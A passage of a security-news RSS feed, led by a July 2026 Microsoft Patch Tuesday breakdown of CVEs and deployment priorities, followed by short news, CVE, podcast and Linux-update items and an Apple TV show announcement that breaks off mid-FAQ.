<li>On MSI Office 2016, apply the client updates – <a href="https://learn.microsoft.com/en-us/office/client-developer/excel/excel-home">Excel</a> (KB5002886), <a href="https://learn.microsoft.com/en-us/office/client-developer/word/word-home">Word</a> (KB5002890), PowerPoint (KB5002867), and five further Office 2016 security updates (<a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002273">KB5002273</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002887">KB5002887</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002748">KB5002748</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002857">KB5002857</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002830">KB5002830</a>) – then exercise macros, external data, embedded objects, and any line-of-business add-ins</li>



<li>On <a href="https://learn.microsoft.com/en-us/sharepoint/sharepoint-server">SharePoint Server</a>, patch 2016 (KB5002891, plus the KB5002892 language pack) and Subscription Edition (KB5002882), then check browser-based editing; the guidance lists SharePoint 2019 with a baseline but ships no 2019 package, so there is nothing to install there</li>
</ul>



<p class="wp-block-paragraph">Mind the rollback rules before you schedule the window: most client updates can be uninstalled, but the server updates cannot and always require a reboot.</p>



<h2 class="wp-block-heading">Developer tools &amp; databases</h2>



<p class="wp-block-paragraph">The developer estate gets a broad but low-drama sweep this month. Both .NET and SQL Server patch widely, but the ask is representative-application validation rather than anything exotic – install on the matching branch and confirm normal behaviour.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/dotnet/core/sdk">.NET</a>: install the SDK updates (8.0.423, 9.0.316, 10.0.302, x64 and x86) and the Framework rollups spanning 3.5 through 4.8.1 – which reach from Windows Server 2012 up to Windows 11 26H1 and Server 2025 – then run a representative set of applications and confirm they function normally</li>



<li><a href="https://learn.microsoft.com/en-us/sql/sql-server/">SQL Server</a>: the <a href="https://learn.microsoft.com/en-us/troubleshoot/sql/releases/servicing-models-sql-server">GDR</a> updates span 2016 SP3 through 2025 – install each on its matching branch and test that each removes cleanly</li>



<li>Check an encrypted client connection through the separately patched Windows SQL client (dbnetlib.dll), which ships outside the server branches</li>
</ul>



<p class="wp-block-paragraph">The Readiness team recommends the following priorities for your larger enterprise deployments:</p>



<ul class="wp-block-list">
<li>Start with printing and graphics: half the high-risk flags sit in the Print Spooler, win32k, and GDI+, so regress shared printers, 32-bit printing, PDF export, metafiles, and window management before anything else</li>



<li>Take NTFS next – extended attributes and crash recovery both touch data integrity – and add a client File History backup-and-restore pass</li>



<li>Give Server 2025 its wider matrix – the Secure Boot/BitLocker combinations, WSL, GPU partitioning, and the scripted backup pass – and work through the stress suites</li>



<li>Run the scripted KeyGuard validation on any <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a> estate, preferably on a dedicated machine.</li>
</ul>



<p class="wp-block-paragraph">Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings:</p>



<ul class="wp-block-list">
<li>Browsers (Microsoft IE and Edge)</li>



<li>Microsoft Windows (both desktop and server)</li>



<li>Microsoft Office</li>



<li>Microsoft Exchange and SQL Server</li>



<li>Microsoft Developer Tools (Visual Studio and .NET)</li>



<li>Adobe (if you get this far)</li>
</ul>



<h2 class="wp-block-heading">Browsers</h2>



<p class="wp-block-paragraph">Edge has had a busier month than usual. Microsoft addressed 46 <a href="https://learn.microsoft.com/en-us/deployedge/microsoft-edge-for-business">Microsoft Edge</a> (Chromium-based) CVEs this cycle. None critical, but heavily weighted to remote code execution (21 entries) and spoofing (13), led by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289">CVE-2026-58289</a>, a remote code execution flaw. A run of further RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981">CVE-2026-57981</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645">CVE-2026-56645</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974">CVE-2026-57974</a>) follows.</p>



<ul class="wp-block-list">
<li>Microsoft Edge – the Edge-specific fixes ship in the Edge stable channel (version 150.0.4078.65, released 9 July). The concentration of RCE and spoofing this month is worth a look for managed Edge estates rather than a routine wave-through.</li>



<li>Chromium upstream – 427 CVEs relayed through MSRC this cycle, spanning the weekly Chrome release cadence since the June report: use-after-free, out-of-bounds read/write, type confusion, and inappropriate-implementation flaws across V8, Dawn, ANGLE, Skia, and Tint. The same fixes ship in the Chrome Stable channel; see the <a href="https://chromereleases.googleblog.com/">Chrome releases blog</a> for the upstream notes.</li>
</ul>



<p class="wp-block-paragraph">The Chromium volume looks (quite) alarming but is routine plumbing: it flows to Edge through its own auto-update channel. Add these browser (Edge) updates to your standard release schedule for your managed environments.</p>



<h2 class="wp-block-heading">Microsoft Windows</h2>



<p class="wp-block-paragraph">Windows carries the bulk of this month’s updates: 406 CVEs, 31 rated critical and 374 important. Elevation of privilege dominates by volume (226 entries), followed by remote code execution (70), information disclosure (70), denial of service (23), and a scatter of security-feature-bypass, tampering, and spoofing entries across the following feature groupings:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> – the standout network cluster: DHCP Server remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50518">CVE-2026-50518</a>, “Exploitation More Likely,” and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56159">CVE-2026-56159</a>), with further critical DHCP Server and DHCP Client RCEs behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48564">CVE-2026-48564</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50370">CVE-2026-50370</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54128">CVE-2026-54128</a>). DHCP servers are the deployment priority.</li>



<li><a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/virtual-switch">VMSwitch</a> and <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> – the Windows VMSwitch elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) is one of the month’s highest-severity flaws, joined by two critical Hyper-V elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50680">CVE-2026-50680</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54127">CVE-2026-54127</a>), guest-to-host risk on virtualisation hosts.</li>



<li>Network stack RCE – a Windows Server Network driver RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56188">CVE-2026-56188</a>, “Exploitation More Likely”), plus <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/tcpip-addressing-and-subnetting">TCP/IP</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54999">CVE-2026-54999</a>), the Reliable Multicast Transport Driver (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54982">CVE-2026-54982</a>), and SSTP (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50694">CVE-2026-50694</a>).</li>



<li>Graphics – Windows <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-overview-of-gdi--about">GDI+</a> remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50380">CVE-2026-50380</a>) and a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/display/directx-graphics-kernel-subsystem">DirectX Graphics Kernel</a> RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50382">CVE-2026-50382</a>), both reachable through document-rendering paths.</li>



<li>Windows Media – a large cluster: three critical <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/microsoft-media-foundation-sdk">Media Foundation</a> RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57090">CVE-2026-57090</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57094">CVE-2026-57094</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57087">CVE-2026-57087</a>) lead 14 Windows Media and seven Media Foundation entries overall.</li>



<li>Identity infrastructure – beyond the exploited ADFS flaw, <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">Active Directory Domain Services</a> takes a critical RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) and <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-certificate-services-overview">Active Directory Certificate Services</a> a critical elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>). Domain controllers take priority again.</li>



<li><a href="https://learn.microsoft.com/en-us/windows/win32/printdocs/print-spooler">Print Spooler</a>, <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a>, and MSMQ – critical RCE/EoP in the Print Spooler (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58608">CVE-2026-58608</a>), <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">Windows Server Update Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50444">CVE-2026-50444</a>), and <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/overview-of-message-queuing-services-architecture">Message Queuing</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54992">CVE-2026-54992</a>, “Exploitation More Likely”), all server-role attack surface.</li>
</ul>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/windows-kernel-mode-kernel-library">Windows Kernel</a> is the most-patched component (28 CVEs, seven “More Likely”), followed by <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> (21), Windows Runtime (17), Windows Media (14), <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> (12), and Win32k (15 across its two entries). Add this Windows update to your Patch Now deployment schedule.</p>



<h2 class="wp-block-heading">Microsoft Office</h2>



<p class="wp-block-paragraph">Microsoft released 96 Office CVEs this month: 19 critical, 76 important. Remote code execution leads (53 entries), ahead of information disclosure (27) and spoofing (10). <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> is the centre of gravity: it touches 39 of the 96 CVEs and supplies the family’s one actively exploited flaw.</p>



<ul class="wp-block-list">
<li>SharePoint Server: has been exploited (who would have guessed) and reaches end of support today. <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, an elevation of privilege, is under active exploitation. Above it sit two critical remote code execution flaws, both “Exploitation More Likely” (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522">CVE-2026-50522</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644">CVE-2026-58644</a>) and a critical security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55040">CVE-2026-55040</a>). SharePoint Server 2016 and 2019 reach end of support on 14 July, so this exploited, critical-heavy set is the final security update those on-premises farms will receive.</li>



<li>Office has experienced a long run of critical remote code execution entries across Office, Word, and PowerPoint (among them <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55033">CVE-2026-55033</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55127">CVE-2026-55127</a> in Word, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55043">CVE-2026-55043</a> in PowerPoint, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55018">CVE-2026-55018</a> in Office), topped by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55045">CVE-2026-55045</a>.</li>
</ul>



<p class="wp-block-paragraph">With an exploited zero-day, two RCEs, and an end-of-support deadline all landing on SharePoint in the same cycle, SharePoint environments are the priority. Add the July Office and SharePoint updates to your Patch Now schedule.</p>



<h2 class="wp-block-heading">Microsoft Exchange and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a></h2>



<p class="wp-block-paragraph">Both Exchange and SQL Server carry critical-rated security vulnerabilities this month. <a href="https://learn.microsoft.com/en-us/exchange/">Exchange Server</a> returns with an on-premises security update for Exchange Server Subscription Edition, the only on-premises release still supported after Exchange Server 2016 and 2019 reached end of support in October 2025; SQL Server takes two critical remote code execution flaws, one of them against SQL Server 2016, which reaches end of support on the same day.</p>



<ul class="wp-block-list">
<li>Exchange Server (on-premises) – <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>, a spoofing vulnerability rated critical and “Exploitation More Likely,” is the headline. Behind it, a remote code execution entry (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55005">CVE-2026-55005</a>) and two elevation-of-privilege flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55006">CVE-2026-55006</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55009">CVE-2026-55009</a>) round out the on-premises set. A separate Exchange Online elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54998">CVE-2026-54998</a>, critical) is fixed service-side with no customer action.</li>



<li>SQL Server – two critical remote code execution flaws: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a> (SQL Server 2025) and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> (which reaches back to SQL Server 2016 SP3), with five further important elevation-of-privilege and information-disclosure entries behind them. The 2016 exposure matters because SQL Server 2016 reaches end of support on 14 July: a critical RCE on a platform taking its final update.</li>
</ul>



<p class="wp-block-paragraph">Both belong on the Patch Now schedule this month: the Exchange on-premises update for its critical spoofing flaw, and the SQL Server update for the two critical RCEs.</p>



<h2 class="wp-block-heading">Microsoft developer tools</h2>



<p class="wp-block-paragraph">Microsoft released 24 CVEs across its developer tooling this month, all rated important. The weighting shifts from last month’s <a href="https://code.visualstudio.com/">Visual Studio Code</a> concentration toward <a href="https://learn.microsoft.com/en-us/dotnet/core/introduction">.NET</a> and <a href="https://learn.microsoft.com/en-us/aspnet/core/overview?view=aspnetcore-10.0">ASP.NET Core</a>, where a run of denial-of-service entries dominates the volume:</p>



<ul class="wp-block-list">
<li>ASP.NET Core and .NET – the two highest-severity entries are ASP.NET Core elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47300">CVE-2026-47300</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47303">CVE-2026-47303</a>), ahead of a .NET security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50528">CVE-2026-50528</a>) and two .NET / .NET Framework remote code execution flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50646">CVE-2026-50646</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50649">CVE-2026-50649</a>).</li>



<li><a href="https://learn.microsoft.com/en-us/visualstudio/get-started/visual-studio-ide?view=visualstudio">Visual Studio</a> and VS Code – a GitHub Copilot / Visual Studio Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109">CVE-2026-41109</a>) and a second VS Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57102">CVE-2026-57102</a>) lead here, with a VS Code remote code execution entry behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50520">CVE-2026-50520</a>) and a Visual Studio RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47305">CVE-2026-47305</a>).</li>
</ul>



<p class="wp-block-paragraph">Add these Microsoft updates to your standard developer update release schedule.</p>



<h2 class="wp-block-heading">Adobe (and third-party updates)</h2>



<p class="wp-block-paragraph">Outside Microsoft’s own catalogue, July is quiet. Adobe issued no Acrobat or Reader security updates. So, the month belongs to Microsoft, and it is a heavy one: 722 CVEs, roughly three times a normal cycle and one of the largest on record. Worth noting that this lands in the same season Microsoft has been talking up AI-assisted vulnerability management, and the AI stack it is selling as the answer, Copilot and Azure OpenAI among them, sits in the centre of this patch cycle’s own critical-rated updates. The (AI) tooling may be getting smarter, but the patch pile is (definitely) not getting smaller. This may be the beginning of an accelerating curve of ever larger patch cycles. My feeling is that we are in the middle of the beginning of this coming patch surge.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.computerworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026]]></title>
<description><![CDATA[Weekly summary of Cybersecurity Insider newsletters in July 2026.
The post Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026 appeared first on eSecurity Planet.]]></description>
<link>https://tsecurity.de/de/3676509/it-security-nachrichten/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676509/it-security-nachrichten/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/</guid>
<pubDate>Fri, 17 Jul 2026 17:39:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Weekly summary of Cybersecurity Insider newsletters in July 2026.</p>
<p>The post <a href="https://www.esecurityplanet.com/weekly-roundup/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/">Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026</a> appeared first on <a href="https://www.esecurityplanet.com/">eSecurity Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-51080 | Proxmox libpvestorage-perl/libpve-storage-perl 8.3.7/9.1.1 XML xml external entity reference]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Proxmox libpvestorage-perl and libpve-storage-perl 8.3.7/9.1.1. This impacts an unknown function of the component XML. The manipulation leads to xml external entity reference.

This vulnerability is uniquely identified as CVE-2026-51080. The...]]></description>
<link>https://tsecurity.de/de/3676476/sicherheitsluecken/cve-2026-51080-proxmox-libpvestorage-perllibpve-storage-perl-837911-xml-xml-external-entity-reference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676476/sicherheitsluecken/cve-2026-51080-proxmox-libpvestorage-perllibpve-storage-perl-837911-xml-xml-external-entity-reference/</guid>
<pubDate>Fri, 17 Jul 2026 17:24:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/proxmox:libpvestorage-perl">Proxmox libpvestorage-perl and libpve-storage-perl 8.3.7/9.1.1</a>. This impacts an unknown function of the component <em>XML</em>. The manipulation leads to xml external entity reference.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-51080">CVE-2026-51080</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026]]></title>
<description><![CDATA[Weekly summary of Cybersecurity Insider newsletters in July 2026. The post Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026 appeared first on eSecurity Planet. This article has been indexed from eSecurity Planet Read…
Read more →
The post Zer...]]></description>
<link>https://tsecurity.de/de/3676456/it-security-nachrichten/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676456/it-security-nachrichten/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/</guid>
<pubDate>Fri, 17 Jul 2026 17:22:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Weekly summary of Cybersecurity Insider newsletters in July 2026. The post Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026 appeared first on eSecurity Planet. This article has been indexed from eSecurity Planet Read…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/zero-days-ai-governance-gaps-and-global-cybercrime-define-this-weeks-security-landscape-in-july-2026/">Zero-Days, AI Governance Gaps, and Global Cybercrime Define This Week’s Security Landscape in July 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BHIS - Talkin' Bout [infosec] News 2026-07-20]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 0x - Views:0 Join us LIVE on Mondays, 4:30pm EST. 
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.
https://bhisnews.transistor.fm

Chat with us on Disco...]]></description>
<link>https://tsecurity.de/de/3676309/it-security-video/bhis-talkin-bout-infosec-news-2026-07-20/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676309/it-security-video/bhis-talkin-bout-infosec-news-2026-07-20/</guid>
<pubDate>Fri, 17 Jul 2026 16:19:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/7wI-ux8QQ_4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Join us LIVE on Mondays, 4:30pm EST. <br />
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.<br />
https://bhisnews.transistor.fm<br />
<br />
Chat with us on Discord! - <br />
https://discord.gg/bhis<br />
🔴live-chat<br />
<br />
🔗 Register for FREE webcasts, summits, and workshops - <br />
https://poweredbybhis.com<br />
<br />
<br />
Brought to you by:<br />
Black Hills Information Security <br />
https://www.blackhillsinfosec.com<br />
<br />
Antisyphon Training<br />
https://www.antisyphontraining.com/<br />
<br />
Active Countermeasures<br />
https://www.activecountermeasures.com<br />
<br />
Wild West Hackin Fest<br />
https://wildwesthackinfest.com<br />
<br />
<br />
#livestream #infosec #news #BHIS #podcast #Cybersecurity #infosecnews<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[When Patching Is Already Too Late]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:16 The discussion makes a bold claim: many organizations no longer have enough time to patch before attackers compromise vulnerable systems.

Instead of treating prevention as the primary strategy, the emphasis shifts toward detecti...]]></description>
<link>https://tsecurity.de/de/3676308/it-security-video/when-patching-is-already-too-late/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676308/it-security-video/when-patching-is-already-too-late/</guid>
<pubDate>Fri, 17 Jul 2026 16:19:12 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:16 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/vqzhfsVUgAg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The discussion makes a bold claim: many organizations no longer have enough time to patch before attackers compromise vulnerable systems.<br />
<br />
Instead of treating prevention as the primary strategy, the emphasis shifts toward detecting intrusions quickly and responding before attackers can cause significant damage.<br />
<br />
This doesn't mean patching is unimportant—it remains a fundamental security practice. The point is that patching alone may not be sufficient against fast-moving threats. Organizations also need strong monitoring, detection, and incident response to reduce the impact when prevention falls short.<br />
<br />
Security today is increasingly about resilience, not just prevention.<br />
<br />
Has cybersecurity reached the point where detection and response deserve as much attention as prevention?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#IncidentResponse #PatchManagement #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The manosphere’s testosterone fever is coming for the troops]]></title>
<description><![CDATA[This is Optimizer, a weekly newsletter sent from Verge senior reviewer Victoria Song that dissects and discusses the latest gizmos and potions that swear they're going to change your life. Opt in for Optimizer here. I was in the middle of writing a different Optimizer column this week when I lear...]]></description>
<link>https://tsecurity.de/de/3676257/it-nachrichten/the-manospheres-testosterone-fever-is-coming-for-the-troops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676257/it-nachrichten/the-manospheres-testosterone-fever-is-coming-for-the-troops/</guid>
<pubDate>Fri, 17 Jul 2026 16:02:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is Optimizer, a weekly newsletter sent from Verge senior reviewer Victoria Song that dissects and discusses the latest gizmos and potions that swear they're going to change your life. Opt in for Optimizer here. I was in the middle of writing a different Optimizer column this week when I learned that Pete Hegseth is […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (cifs-utils, container-tools:rhel8, libreoffice, nodejs:24, perl-XML-LibXML, and python3.12), Fedora (ansible-collection-ansible-posix, firefox, freerdp, ImageMagick, mingw-glib2, perl-DBI, perl-HTTP-Date, rust-cargo-rpmstatus, and rust-opendal), Ora...]]></description>
<link>https://tsecurity.de/de/3676176/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676176/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 17 Jul 2026 15:26:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (cifs-utils, container-tools:rhel8, libreoffice, nodejs:24, perl-XML-LibXML, and python3.12), <b>Fedora</b> (ansible-collection-ansible-posix, firefox, freerdp, ImageMagick, mingw-glib2, perl-DBI, perl-HTTP-Date, rust-cargo-rpmstatus, and rust-opendal), <b>Oracle</b> (cifs-utils, gegl, gimp, git-lfs, go-toolset:ol8, hplip, kernel, libreoffice, maven:3.9, perl-XML-LibXML, python3, python3.12, python3.9, and uek-kernel), <b>Red Hat</b> (kernel, kernel-rt, and podman), <b>Slackware</b> (netatalk), <b>SUSE</b> (agama, aws-nitro-enclaves-binaryblobs-upstream, gimp, gpsd, grafana, hostapd, ImageMagick, jackson-databind, kernel, libssh2_org, nm-configurator, opennlp, perl-Mojolicious, python-Pillow, python-python-engineio, python-python-socketio, and tomcat11), and <b>Ubuntu</b> (ntfs-3g, python-authlib, ruby2.3, tar, and ubuntu-advantage-tools).]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Confirms Stillwater Season 5 Release Date, All Episodes Arrive This August]]></title>
<description><![CDATA[Apple TV has confirmed the release date for Stillwater season 5, giving families another collection of gentle stories focused on emotions, friendship, and everyday challenges. The animated series will return globally on Friday, August 21, 2026, with all five new episodes arriving together.



The...]]></description>
<link>https://tsecurity.de/de/3676102/ios-mac-os/apple-tv-confirms-stillwater-season-5-release-date-all-episodes-arrive-this-august/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676102/ios-mac-os/apple-tv-confirms-stillwater-season-5-release-date-all-episodes-arrive-this-august/</guid>
<pubDate>Fri, 17 Jul 2026 14:54:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has confirmed the release date for Stillwater season 5, giving families another collection of gentle stories focused on emotions, friendship, and everyday challenges. The animated series will return globally on Friday, August 21, 2026, with all five new episodes arriving together.



The new season continues the award-winning story of siblings Karl, Addy, and Michael, whose wise panda neighbor helps them understand their feelings and look at difficult situations from a calmer perspective. Viewers can currently stream the first four seasons on Apple TV.



Here are the main details about the upcoming season:




Release date: Friday, August 21, 2026



Number of episodes: Five



Release schedule: All episodes will arrive together



Genre: Animated kids and family series



Start airing date: August 21, 2026



Finish date: August 21, 2026



Where to watch: Apple TV



Main voice cast: James Sie, Eva Ariel Binder, Tucker Chandler, and Judah Mackey




What is Stillwater season 5 about?







Stillwater follows Karl, Addy, and Michael as they deal with problems that feel familiar to young viewers, including disappointment, uncertainty, disagreements, and fear of trying something new.



Their neighbor Stillwater listens to their concerns and often shares a thoughtful story that helps them see the situation differently. His advice encourages the children to slow down, understand their emotions, and find their own way forward.



Season 5 will continue this familiar format through five new adventures. Each episode will focus on the children learning more about themselves, their relationships, and the world around them. The series remains inspired by Jon J Muth’s bestselling Zen book collection.



The first look at the season shows Stillwater returning alongside the three siblings, suggesting that the new episodes will maintain the peaceful visual style and warm storytelling that have defined the show since its 2020 debut.



There are currently no major plot details or episode descriptions available, so viewers will need to wait for a trailer or further announcements to learn which specific challenges Karl, Addy, and Michael will face.




https://www.youtube.com/watch?v=zz1GkcvkT1g




FAQs



When is the Stillwater season 5 release date?



Stillwater season 5 will premiere globally on Apple TV on Friday, August 21, 2026.



How many episodes are in Stillwater season 5?

